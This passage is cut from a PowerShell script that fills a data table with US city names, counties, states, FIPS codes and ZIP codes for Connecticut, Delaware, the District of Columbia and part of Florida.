$Cities.Rows.Add("Westport","Fairfield","Connecticut","CT","9","06880") + $null = $Cities.Rows.Add("Weston","Fairfield","Connecticut","CT","9","06883") + $null = $Cities.Rows.Add("West redding","Fairfield","Connecticut","CT","9","06896") + $null = $Cities.Rows.Add("Wilton","Fairfield","Connecticut","CT","9","06897") + $null = $Cities.Rows.Add("Zcta 068hh","Fairfield","Connecticut","CT","9","068HH") + $null = $Cities.Rows.Add("Stamford","Fairfield","Connecticut","CT","9","06901") + $null = $Cities.Rows.Add("Stamford","Fairfield","Connecticut","CT","9","06902") + $null = $Cities.Rows.Add("Stamford","Fairfield","Connecticut","CT","9","06903") + $null = $Cities.Rows.Add("Ridgeway","Fairfield","Connecticut","CT","9","06905") + $null = $Cities.Rows.Add("Stamford","Fairfield","Connecticut","CT","9","06906") + $null = $Cities.Rows.Add("Stamford","Fairfield","Connecticut","CT","9","06907") + $null = $Cities.Rows.Add("Zcta 069hh","Fairfield","Connecticut","CT","9","069HH") + $null = $Cities.Rows.Add("Bear","New Castle","Delaware","DE","10","19701") + $null = $Cities.Rows.Add("Newark","New Castle","Delaware","DE","10","19702") + $null = $Cities.Rows.Add("Claymont","New Castle","Delaware","DE","10","19703") + $null = $Cities.Rows.Add("Delaware city","New Castle","Delaware","DE","10","19706") + $null = $Cities.Rows.Add("Hockessin","New Castle","Delaware","DE","10","19707") + $null = $Cities.Rows.Add("Middletown","New Castle","Delaware","DE","10","19709") + $null = $Cities.Rows.Add("Montchanin","New Castle","Delaware","DE","10","19710") + $null = $Cities.Rows.Add("Newark","New Castle","Delaware","DE","10","19711") + $null = $Cities.Rows.Add("Newark","New Castle","Delaware","DE","10","19713") + $null = $Cities.Rows.Add("Manor","New Castle","Delaware","DE","10","19720") + $null = $Cities.Rows.Add("Odessa","New Castle","Delaware","DE","10","19730") + $null = $Cities.Rows.Add("Port penn","New Castle","Delaware","DE","10","19731") + $null = $Cities.Rows.Add("Rockland","New Castle","Delaware","DE","10","19732") + $null = $Cities.Rows.Add("Saint georges","New Castle","Delaware","DE","10","19733") + $null = $Cities.Rows.Add("Townsend","New Castle","Delaware","DE","10","19734") + $null = $Cities.Rows.Add("Yorklyn","New Castle","Delaware","DE","10","19736") + $null = $Cities.Rows.Add("Zcta 197hh","New Castle","Delaware","DE","10","197HH") + $null = $Cities.Rows.Add("Wilmington","New Castle","Delaware","DE","10","19801") + $null = $Cities.Rows.Add("Wilmington","New Castle","Delaware","DE","10","19802") + $null = $Cities.Rows.Add("Talleyville","New Castle","Delaware","DE","10","19803") + $null = $Cities.Rows.Add("Newport","New Castle","Delaware","DE","10","19804") + $null = $Cities.Rows.Add("Wilmington","New Castle","Delaware","DE","10","19805") + $null = $Cities.Rows.Add("Wilmington","New Castle","Delaware","DE","10","19806") + $null = $Cities.Rows.Add("Greenville","New Castle","Delaware","DE","10","19807") + $null = $Cities.Rows.Add("Marshallton","New Castle","Delaware","DE","10","19808") + $null = $Cities.Rows.Add("Edgemoor","New Castle","Delaware","DE","10","19809") + $null = $Cities.Rows.Add("Edgemoor","New Castle","Delaware","DE","10","19810") + $null = $Cities.Rows.Add("Zcta 198hh","New Castle","Delaware","DE","10","198HH") + $null = $Cities.Rows.Add("Dover","Kent","Delaware","DE","10","19901") + $null = $Cities.Rows.Add("Dover afb","Kent","Delaware","DE","10","19902") + $null = $Cities.Rows.Add("Zcta 19904","Kent","Delaware","DE","10","19904") + $null = $Cities.Rows.Add("Bethany beach","Sussex","Delaware","DE","10","19930") + $null = $Cities.Rows.Add("Bethel","Sussex","Delaware","DE","10","19931") + $null = $Cities.Rows.Add("Bridgeville","Sussex","Delaware","DE","10","19933") + $null = $Cities.Rows.Add("Camden wyoming","Kent","Delaware","DE","10","19934") + $null = $Cities.Rows.Add("Clayton","Kent","Delaware","DE","10","19938") + $null = $Cities.Rows.Add("Dagsboro","Sussex","Delaware","DE","10","19939") + $null = $Cities.Rows.Add("Delmar","Sussex","Delaware","DE","10","19940") + $null = $Cities.Rows.Add("Ellendale","Sussex","Delaware","DE","10","19941") + $null = $Cities.Rows.Add("Farmington","Kent","Delaware","DE","10","19942") + $null = $Cities.Rows.Add("Felton","Kent","Delaware","DE","10","19943") + $null = $Cities.Rows.Add("Fenwick island","Sussex","Delaware","DE","10","19944") + $null = $Cities.Rows.Add("Frankford","Sussex","Delaware","DE","10","19945") + $null = $Cities.Rows.Add("Frederica","Kent","Delaware","DE","10","19946") + $null = $Cities.Rows.Add("Georgetown","Sussex","Delaware","DE","10","19947") + $null = $Cities.Rows.Add("Greenwood","Sussex","Delaware","DE","10","19950") + $null = $Cities.Rows.Add("Harbeson","Sussex","Delaware","DE","10","19951") + $null = $Cities.Rows.Add("Harrington","Kent","Delaware","DE","10","19952") + $null = $Cities.Rows.Add("Hartly","Kent","Delaware","DE","10","19953") + $null = $Cities.Rows.Add("Houston","Kent","Delaware","DE","10","19954") + $null = $Cities.Rows.Add("Kenton","Kent","Delaware","DE","10","19955") + $null = $Cities.Rows.Add("Laurel","Sussex","Delaware","DE","10","19956") + $null = $Cities.Rows.Add("Lewes","Sussex","Delaware","DE","10","19958") + $null = $Cities.Rows.Add("Lincoln","Sussex","Delaware","DE","10","19960") + $null = $Cities.Rows.Add("Magnolia","Kent","Delaware","DE","10","19962") + $null = $Cities.Rows.Add("Milford","Sussex","Delaware","DE","10","19963") + $null = $Cities.Rows.Add("Marydel","Kent","Delaware","DE","10","19964") + $null = $Cities.Rows.Add("Long neck","Sussex","Delaware","DE","10","19966") + $null = $Cities.Rows.Add("Millville","Sussex","Delaware","DE","10","19967") + $null = $Cities.Rows.Add("Milton","Sussex","Delaware","DE","10","19968") + $null = $Cities.Rows.Add("Millville","Sussex","Delaware","DE","10","19970") + $null = $Cities.Rows.Add("Dewey beach","Sussex","Delaware","DE","10","19971") + $null = $Cities.Rows.Add("Seaford","Sussex","Delaware","DE","10","19973") + $null = $Cities.Rows.Add("Selbyville","Sussex","Delaware","DE","10","19975") + $null = $Cities.Rows.Add("Smyrna","Kent","Delaware","DE","10","19977") + $null = $Cities.Rows.Add("Viola","Kent","Delaware","DE","10","19979") + $null = $Cities.Rows.Add("Woodside","Kent","Delaware","DE","10","19980") + $null = $Cities.Rows.Add("Zcta 199hh","Kent","Delaware","DE","10","199HH") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20001") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20002") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20003") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20004") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20005") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20006") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20007") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20008") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20009") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20010") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20011") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20012") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20015") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20016") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20017") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20018") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20019") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20020") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20024") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20032") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20036") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20037") + $null = $Cities.Rows.Add("Zcta 200hh","District of Columbia","District of columbia","DC","11","200HH") + $null = $Cities.Rows.Add("Fort mcnair","District of Columbia","District of columbia","DC","11","20319") + $null = $Cities.Rows.Add("Bolling afb","District of Columbia","District of columbia","DC","11","20332") + $null = $Cities.Rows.Add("Washington","District of Columbia","District of columbia","DC","11","20336") + $null = $Cities.Rows.Add("Naval research l","District of Columbia","District of columbia","DC","11","20375") + $null = $Cities.Rows.Add("Zcta 203xx","District of Columbia","District of columbia","DC","11","203XX") + $null = $Cities.Rows.Add("Branford","Suwannee","Florida","FL","12","32008") + $null = $Cities.Rows.Add("Bryceville","Nassau","Florida","FL","12","32009") + $null = $Cities.Rows.Add("Callahan","Nassau","Florida","FL","12","32011") + $null = $Cities.Rows.Add("Day","Lafayette","Florida","FL","12","32013") + $null = $Cities.Rows.Add("Zcta 32024","Columbia","Florida","FL","12","32024") + $null = $Cities.Rows.Add("Zcta 32025","Columbia","Florida","FL","12","32025") + $null = $Cities.Rows.Add("Elkton","St. Johns","Florida","FL","12","32033") + $null = $Cities.Rows.Add("Amelia island","Nassau","Florida","FL","12","32034") + $null = $Cities.Rows.Add("Fort white","Columbia","Florida","FL","12","32038") + $null = $Cities.Rows.Add("Glen saint mary","Baker","Florida","FL","12","32040") + $null = $Cities.Rows.Add("Green cove sprin","Clay","Florida","FL","12","32043") + $null = $Cities.Rows.Add("Hampton","Bradford","Florida","FL","12","32044") + $null = $Cities.Rows.Add("Hilliard","Nassau","Florida","FL","12","32046") + $null = $Cities.Rows.Add("Jasper","Hamilton","Florida","FL","12","32052") + $null = $Cities.Rows.Add("Jennings","Hamilton","Florida","FL","12","32053") + $null = $Cities.Rows.Add("Lake butler","Union","Florida","FL","12","32054") + $null = $Cities.Rows.Add("Lake city","Columbia","Florida","FL","12","32055") + $null = $Cities.Rows.Add("Lawtey","Bradford","Florida","FL","12","32058") + $null = $Cities.Rows.Add("Lee","Madison","Florida","FL","12","32059") + $null = $Cities.Rows.Add("Boys ranch","Suwannee","Florida","FL","12","32060") + $null = $Cities.Rows.Add("Lulu","Columbia","Florida","FL","12","32061") + $null = $Cities.Rows.Add("Mc alpin","Suwannee","Florida","FL","12","32062") + $null = $Cities.Rows.Add("Macclenny","Baker","Florida","FL","12","32063") + $null = $Cities.Rows.Add("Orange park","Clay","Florida","FL","12","32065") + $null = $Cities.Rows.Add("Mayo","Lafayette","Florida","FL","12","32066") + $null = $Cities.Rows.Add("Middleburg","Clay","Florida","FL","12","32068") + $null = $Cities.Rows.Add("O brien","Suwannee","Florida","FL","12","32071") + $null = $Cities.Rows.Add("Olustee","Baker","Florida","FL","12","32072") + $null = $Cities.Rows.Add("Orange park","Clay","Florida","FL","12","32073") + $null = $Cities.Rows.Add("Penney farms","Clay","Florida","FL","12","32079") + $null = $Cities.Rows.Add("Ponte vedra beac","St. Johns","Florida","FL","12","32082") + $null = $Cities.Rows.Add("Raiford","Union","Florida","FL","12","32083") + $null = $Cities.Rows.Add("Saint augustine","St. Johns","Florida","FL","12","32084") + $null = $Cities.Rows.Add("Saint augustine","St. Johns","Florida","FL","12","32086") + $null = $Cities.Rows.Add("Sanderson","Baker","Florida","FL","12","32087") + $null = $Cities.Rows.Add("Starke","Bradford","Florida","FL","12","32091") + $null = $Cities.Rows.Add("Saint augustine","St. Johns","Florida","FL","12","32092") + $null = $Cities.Rows.Add("Wellborn","Suwannee","Florida","FL","12","32094") + $null = $Cities.Rows.Add("Saint augustine","St. Johns","Florida","FL","12","32095") + $null = $Cities.Rows.Add("White springs","Hamilton","Florida","FL","12","32096") + $null = $Cities.Rows.Add("Yulee","Nassau","Florida","FL","12","32097") + $null = $Cities.Rows.Add("Zcta 320hh","Bradford","Florida","FL","12","320HH") + $null = $Cities.Rows.Add("Zcta 320xx","Baker","Florida","FL","12","320XX") + $null = $Cities.Rows.Add("Astor","Lake","Florida","FL","12","32102") + $null = $Cities.Rows.Add("Bunnell","Flagler","Florida","FL","12","32110") + $null = $Cities.Rows.Add("Crescent city","Putnam","Florida","FL","12","32112") + $null = $Cities.Rows.Add("Citra","Marion","Florida","FL","12","32113") + $null = $Cities.Rows.Add("Daytona beach","Volusia","Florida","FL","12","32114") + $null = $Cities.Rows.Add("Holly hill","Volusia","Florida","FL","12","32117") + $null = $Cities.Rows.Add("Daytona beach","Volusia","Florida","FL","12","32118") + $null = $Cities.Rows.Add("Dunlawton","Volusia","Florida","FL","12","32119") + $null = $Cities.Rows.Add("Port orange","Volusia","Florida","FL","12","32124") + $null = $Cities.Rows.Add("Port orange","Volusia","Florida","FL","12","32127") + $null = $Cities.Rows.Add("De leon springs","Volusia","Florida","FL","12","32130") + $null = $Cities.Rows.Add("East palatka","Putnam","Florida","FL","12","32131") + $null = $Cities.Rows.Add("Edgewater","Volusia","Florida","FL","12","32132") + $null = $Cities.Rows.Add("Salt springs","Marion","Florida","FL","12","32134") + $null = $Cities.Rows.Add("Flagler beach","Flagler","Florida","FL","12","32136") + $null = $Cities.Rows.Add("Palm coast","Flagler","Florida","FL","12","32137") + $null = $Cities.Rows.Add("Grandin","Putnam","Florida","FL","12","32138") + $null = $Cities.Rows.Add("Georgetown","Putnam","Florida","FL","12","32139") + $null = $Cities.Rows.Add("Florahome","Putnam","Florida","FL","12","32140") + $null = $Cities.Rows.Add("Edgewater","Volusia","Florida","FL","12","32141") + $null = $Cities.Rows.Add("Hastings","St. Johns","Florida","FL","12","32145") + $null = $Cities.Rows.Add("Hollister","Putnam","Florida","FL","12","32147") + $null = $Cities.Rows.Add("Interlachen","Putnam","Florida","FL","12","32148") + $null = $Cities.Rows.Add("Lake como","Putnam","Florida","FL","12","32157") + $null = $Cities.Rows.Add("Lady lake","Lake","Florida","FL","12","32159") + $null = $Cities.Rows.Add("Zcta 32164","Flagler","Florida","FL","12","32164") + $null = $Cities.Rows.Add("New smyrna beach","Volusia","Florida","FL","12","32168") + $null = $Cities.Rows.Add("New smyrna beach","Volusia","Florida","FL","12","32169") + $null = $Cities.Rows.Add("Ormond beach","Volusia","Florida","FL","12","32174") + $null = $Cities.Rows.Add("Ormond beach","Volusia","Florida","FL","12","32176") + $null = $Cities.Rows.Add("Palatka","Putnam","Florida","FL","12","32177") + $null = $Cities.Rows.Add("Ocklawaha","Marion","Florida","FL","12","32179") + $null = $Cities.Rows.Add("Pierson","Volusia","Florida","FL","12","32180") + $null = $Cities.Rows.Add("Pomona park","Putnam","Florida","FL","12","32181") + $null = $Cities.Rows.Add("Orange springs","Marion","Florida","FL","12","32182") + $null = $Cities.Rows.Add("Zcta 32183","Marion","Florida","FL","12","32183") + $null = $Cities.Rows.Add("Putnam hall","Putnam","Florida","FL","12","32185") + $null = $Cities.Rows.Add("San mateo","Putnam","Florida","FL","12","32187") + $null = $Cities.Rows.Add("Satsuma","Putnam","Florida","FL","12","32189") + $null = $Cities.Rows.Add("Seville","Volusia","Florida","FL","12","32190") + $null = $Cities.Rows.Add("Welaka","Putnam","Florida","FL","12","32193") + $null = $Cities.Rows.Add("Weirsdale","Marion","Florida","FL","12","32195") + $null = $Cities.Rows.Add("Zcta 321hh","Flagler","Florida","FL","12","321HH") + $null = $Cities.Rows.Add("Zcta 321xx","Flagler","Florida","FL","12","321XX") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32202") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32204") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32205") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32206") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32207") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32208") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32209") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32210") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32211") + $null = $Cities.Rows.Add("Jacksonville n a","Duval","Florida","FL","12","32212") + $null = $Cities.Rows.Add("Cecil field nas","Duval","Florida","FL","12","32215") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32216") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32217") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32218") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32219") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32220") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32221") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32222") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32223") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32224") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32225") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32226") + $null = $Cities.Rows.Add("Jacksonville bea","Duval","Florida","FL","12","32227") + $null = $Cities.Rows.Add("Atlantic beach","Duval","Florida","FL","12","32233") + $null = $Cities.Rows.Add("Baldwin","Duval","Florida","FL","12","32234") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32244") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32246") + $null = $Cities.Rows.Add("Jacksonville bea","Duval","Florida","FL","12","32250") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32254") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32256") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32257") + $null = $Cities.Rows.Add("Jacksonville","Duval","Florida","FL","12","32258") + $null = $Cities.Rows.Add("Jacksonville","St. Johns","Florida","FL","12","32259") + $null = $Cities.Rows.Add("Neptune beach","Duval","Florida","FL","12","32266") + $null = $Cities.Rows.Add("Zcta 32277","Duval","Florida","FL","12","32277") + $null = $Cities.Rows.Add("Zcta 322hh","Duval","Florida","FL","12","322HH") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32301") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32303") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32304") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32308") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32310") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32311") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32312") + $null = $Cities.Rows.Add("Apalachicola","Franklin","Florida","FL","12","32320") + $null = $Cities.Rows.Add("Bristol","Liberty","Florida","FL","12","32321") + $null = $Cities.Rows.Add("Carrabelle","Franklin","Florida","FL","12","32322") + $null = $Cities.Rows.Add("Lanark village","Franklin","Florida","FL","12","32323") + $null = $Cities.Rows.Add("Chattahoochee","Gadsden","Florida","FL","12","32324") + $null = $Cities.Rows.Add("Crawfordville","Wakulla","Florida","FL","12","32327") + $null = $Cities.Rows.Add("Saint george isl","Franklin","Florida","FL","12","32328") + $null = $Cities.Rows.Add("Greensboro","Gadsden","Florida","FL","12","32330") + $null = $Cities.Rows.Add("Greenville","Madison","Florida","FL","12","32331") + $null = $Cities.Rows.Add("Gretna","Gadsden","Florida","FL","12","32332") + $null = $Cities.Rows.Add("Havana","Gadsden","Florida","FL","12","32333") + $null = $Cities.Rows.Add("Hosford","Liberty","Florida","FL","12","32334") + $null = $Cities.Rows.Add("Sumatra","Liberty","Florida","FL","12","32335") + $null = $Cities.Rows.Add("Lamont","Jefferson","Florida","FL","12","32336") + $null = $Cities.Rows.Add("Lloyd","Jefferson","Florida","FL","12","32337") + $null = $Cities.Rows.Add("Madison","Madison","Florida","FL","12","32340") + $null = $Cities.Rows.Add("Midway","Gadsden","Florida","FL","12","32343") + $null = $Cities.Rows.Add("Monticello","Jefferson","Florida","FL","12","32344") + $null = $Cities.Rows.Add("Panacea","Wakulla","Florida","FL","12","32346") + $null = $Cities.Rows.Add("Perry","Taylor","Florida","FL","12","32347") + $null = $Cities.Rows.Add("Pinetta","Madison","Florida","FL","12","32350") + $null = $Cities.Rows.Add("Quincy","Gadsden","Florida","FL","12","32351") + $null = $Cities.Rows.Add("Saint marks","Wakulla","Florida","FL","12","32355") + $null = $Cities.Rows.Add("Salem","Taylor","Florida","FL","12","32356") + $null = $Cities.Rows.Add("Shady grove","Taylor","Florida","FL","12","32357") + $null = $Cities.Rows.Add("Sopchoppy","Wakulla","Florida","FL","12","32358") + $null = $Cities.Rows.Add("Steinhatchee","Taylor","Florida","FL","12","32359") + $null = $Cities.Rows.Add("Telogia","Liberty","Florida","FL","12","32360") + $null = $Cities.Rows.Add("Wacissa","Jefferson","Florida","FL","12","32361") + $null = $Cities.Rows.Add("Tallahassee","Leon","Florida","FL","12","32399") + $null = $Cities.Rows.Add("Zcta 323hh","Dixie","Florida","FL","12","323HH") + $null = $Cities.Rows.Add("Zcta 323xx","Taylor","Florida","FL","12","323XX") + $null = $Cities.Rows.Add("Panama city","Bay","Florida","FL","12","32401") + $null = $Cities.Rows.Add("Panama city","Bay","Florida","FL","12","32403") + $null = $Cities.Rows.Add("Panama city","Bay","Florida","FL","12","32404") + $null = $Cities.Rows.Add("Panama city","Bay","Florida","FL","12","32405") + $null = $Cities.Rows.Add("Panama city beac","Bay","Florida","FL","12","32407") + $null = $Cities.Rows.Add("Panama city beac","Bay","Florida","FL","12","32408") + $null = $Cities.Rows.Add("Southport","Bay","Florida","FL","12","32409") + $null = $Cities.Rows.Add("Mexico beach","Bay","Florida","FL","12","32410") + $null = $Cities.Rows.Add("Panama city beac","Bay","Florida","FL","12","32413") + $null = $Cities.Rows.Add("Alford","Jackson","Florida","FL","12","32420") + $null = $Cities.Rows.Add("Altha","Calhoun","Florida","FL","12","32421") + $null = $Cities.Rows.Add("Argyle","Walton","Florida","FL","12","32422") + $null = $Cities.Rows.Add("Bascom","Jackson","Florida","FL","12","32423") + $null = $Cities.Rows.Add("Blountstown","Calhoun","Florida","FL","12","32424") + $null = $Cities.Rows.Add("Bonifay","Holmes","Florida","FL","12","32425") + $null = $Cities.Rows.Add("Campbellton","Jackson","Florida","FL","12","32426") + $null = $Cities.Rows.Add("Caryville","Holmes","Florida","FL","12","32427") + $null = $Cities.Rows.Add("Chipley","Washington","Florida","FL","12","32428") + $null = $Cities.Rows.Add("Clarksville","Calhoun","Florida","FL","12","32430") + $null = $Cities.Rows.Add("Cottondale","Jackson","Florida","FL","12","32431") + $null = $Cities.Rows.Add("Cypress","Jackson","Florida","FL","12","32432") + $null = $Cities.Rows.Add("De funiak spring","Walton","Florida","FL","12","32433") + $null = $Cities.Rows.Add("Ebro","Washington","Florida","FL","12","32437") + $null = $Cities.Rows.Add("Fountain","Bay","Florida","FL","12","32438") + $null = $Cities.Rows.Add("Freeport","Walton","Florida","FL","12","32439") + $null = $Cities.Rows.Add("Graceville","Jackson","Florida","FL","12","32440") + $null = $Cities.Rows.Add("Grand ridge","Jackson","Florida","FL","12","32442") + $null = $Cities.Rows.Add("Greenwood","Jackson","Florida","FL","12","32443") + $null = $Cities.Rows.Add("Lynn haven","Bay","Florida","FL","12","32444") + $null = $Cities.Rows.Add("Malone","Jackson","Florida","FL","12","32445") + $null = $Cities.Rows.Add("Marianna","Jackson","Florida","FL","12","32446") + $null = $Cities.Rows.Add("Marianna","Jackson","Florida","FL","12","32447") + $null = $Cities.Rows.Add("Zcta 32448","Jackson","Florida","FL","12","32448") + $null = $Cities.Rows.Add("Kinard","Calhoun","Florida","FL","12","32449") + $null = $Cities.Rows.Add("Ponce de leon","Walton","Florida","FL","12","32455") + $null = $Cities.Rows.Add("Port saint joe","Gulf","Florida","FL","12","32456") + $null = $Cities.Rows.Add("Santa rosa beach","Walton","Florida","FL","12","32459") + $null = $Cities.Rows.Add("Sneads","Jackson","Florida","FL","12","32460") + $null = $Cities.Rows.Add("Vernon","Washington","Florida","FL","12","32462") + $null = $Cities.Rows.Add("Wausau","Washington","Florida","FL","12","32463") + $null = $Cities.Rows.Add("Westville","Holmes","Florida","FL","12","32464") + $null = $Cities.Rows.Add("Wewahitchka","Gulf","Florida","FL","12","32465") + $null = $Cities.Rows.Add("Youngstown","Bay","Florida","FL","12","32466") + $null = $Cities.Rows.Add("Zcta 324hh","Bay","Florida","FL","12","324HH") + $null = $Cities.Rows.Add("Zcta 324xx","Washington","Florida","FL","12","324XX") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32501") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32503") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32504") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32505") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32506") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32507") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32508") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32514") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32526") + $null = $Cities.Rows.Add("Baker","Okaloosa","Florida","FL","12","32531") + $null = $Cities.Rows.Add("Cantonment","Escambia","Florida","FL","12","32533") + $null = $Cities.Rows.Add("Pensacola","Escambia","Florida","FL","12","32534") + $null = $Cities.Rows.Add("Century","Escambia","Florida","FL","12","32535") + $null = $Cities.Rows.Add("Crestview","Okaloosa","Florida","FL","12","32536") + $null = $Cities.Rows.Add("Zcta 32539","Okaloosa","Florida","FL","12","32539") + $null = $Cities.Rows.Add("Sandestin","Okaloosa","Florida","FL","12","32541") + $null = $Cities.Rows.Add("Eglin a f b","Okaloosa","Florida","FL","12","32542") + $null = $Cities.Rows.Add("Hurlburt field","Okaloosa","Florida","FL","12","32544") + $null = $Cities.Rows.Add("Fort walton beac","Okaloosa","Florida","FL","12","32547") + $null = $Cities.Rows.Add("Fort walton beac","Okaloosa","Florida","FL","12","32548") + $null = $Cities.Rows.Add("Gulf breeze","Santa Rosa","Florida","FL","12","32561") + $null = $Cities.Rows.Add("Holt","Okaloosa","Florida","FL","12","32564") + $null = $Cities.Rows.Add("Jay","Santa Rosa","Florida","FL","12","32565") + $null = $Cities.Rows.Add("Navarre","Santa Rosa","Florida","FL","12","32566") + $null = $Cities.Rows.Add("Laurel hill","Okaloosa","Florida","FL","12","32567") + $null = $Cities.Rows.Add("Walnut hill","Escambia","Florida","FL","12","32568") + $null = $Cities.Rows.Add("Mary esther","Okaloosa","Florida","FL","12","32569") + $null = $Cities.Rows.Add("Milton","Santa Rosa","Florida","FL","12","32570") + $null = $Cities.Rows.Add("Pace","Santa Rosa","Florida","FL","12","32571") + $null = $Cities.Rows.Add("Molino","Escambia","Florida","FL","12","32577") + $null = $Cities.Rows.Add("Niceville","Okaloosa","Florida","FL","12","32578") + $null = $Cities.Rows.Add("Shalimar","Okaloosa","Florida","FL","12","32579") + $null = $Cities.Rows.Add("Valparaiso","Okaloosa","Florida","FL","12","32580") + $null = $Cities.Rows.Add("Milton","Santa Rosa","Florida","FL","12","32583") + $null = $Cities.Rows.Add("Zcta 325hh","Escambia","Florida","FL","12","325HH") + $null = $Cities.Rows.Add("Zcta 325xx","Santa Rosa","Florida","FL","12","325XX") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32601") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32603") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32605") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32606") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32607") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32608") + $null = $Cities.Rows.Add("Gainesville","Alachua","Florida","FL","12","32609") + $null = $Cities.Rows.Add("Santa fe","Alachua","Florida","FL","12","32615") + $null = $Cities.Rows.Add("Zcta 32616","Alachua","Florida","FL","12","32616") + $null = $Cities.Rows.Add("Anthony","Marion","Florida","FL","12","32617") + $null = $Cities.Rows.Add("Archer","Alachua","Florida","FL","12","32618") + $null = $Cities.Rows.Add("Bell","Gilchrist","Florida","FL","12","32619") + $null = $Cities.Rows.Add("Bronson","Levy","Florida","FL","12","32621") + $null = $Cities.Rows.Add("Brooker","Bradford","Florida","FL","12","32622") + $null = $Cities.Rows.Add("Cedar key","Levy","Florida","FL","12","32625") + $null = $Cities.Rows.Add("Chiefland","Levy","Florida","FL","12","32626") + $null = $Cities.Rows.Add("Cross city","Dixie","Florida","FL","12","32628") + $null = $Cities.Rows.Add("Gulf hammock","Levy","Florida","FL","12","32639") + $null = $Cities.Rows.Add("Hawthorne","Putnam","Florida","FL","12","32640") + $null = $Cities.Rows.Add("Zcta 32641","Alachua","Florida","FL","12","32641") + $null = $Cities.Rows.Add("High springs","Alachua","Florida","FL","12","32643") + $null = $Cities.Rows.Add("Horseshoe beach","Dixie","Florida","FL","12","32648") + $null = $Cities.Rows.Add("Zcta 32653","Alachua","Florida","FL","12","32653") + $null = $Cities.Rows.Add("Island grove","Alachua","Florida","FL","12","32654") + $null = $Cities.Rows.Add("Keystone heights","Clay","Florida","FL","12","32656") + $null = $Cities.Rows.Add("La crosse","Alachua","Florida","FL","12","32658") + $null = $Cities.Rows.Add("Lochloosa","Alachua","Florida","FL","12","32662") + $null = $Cities.Rows.Add("Mc intosh","Marion","Florida","FL","12","32664") + $null = 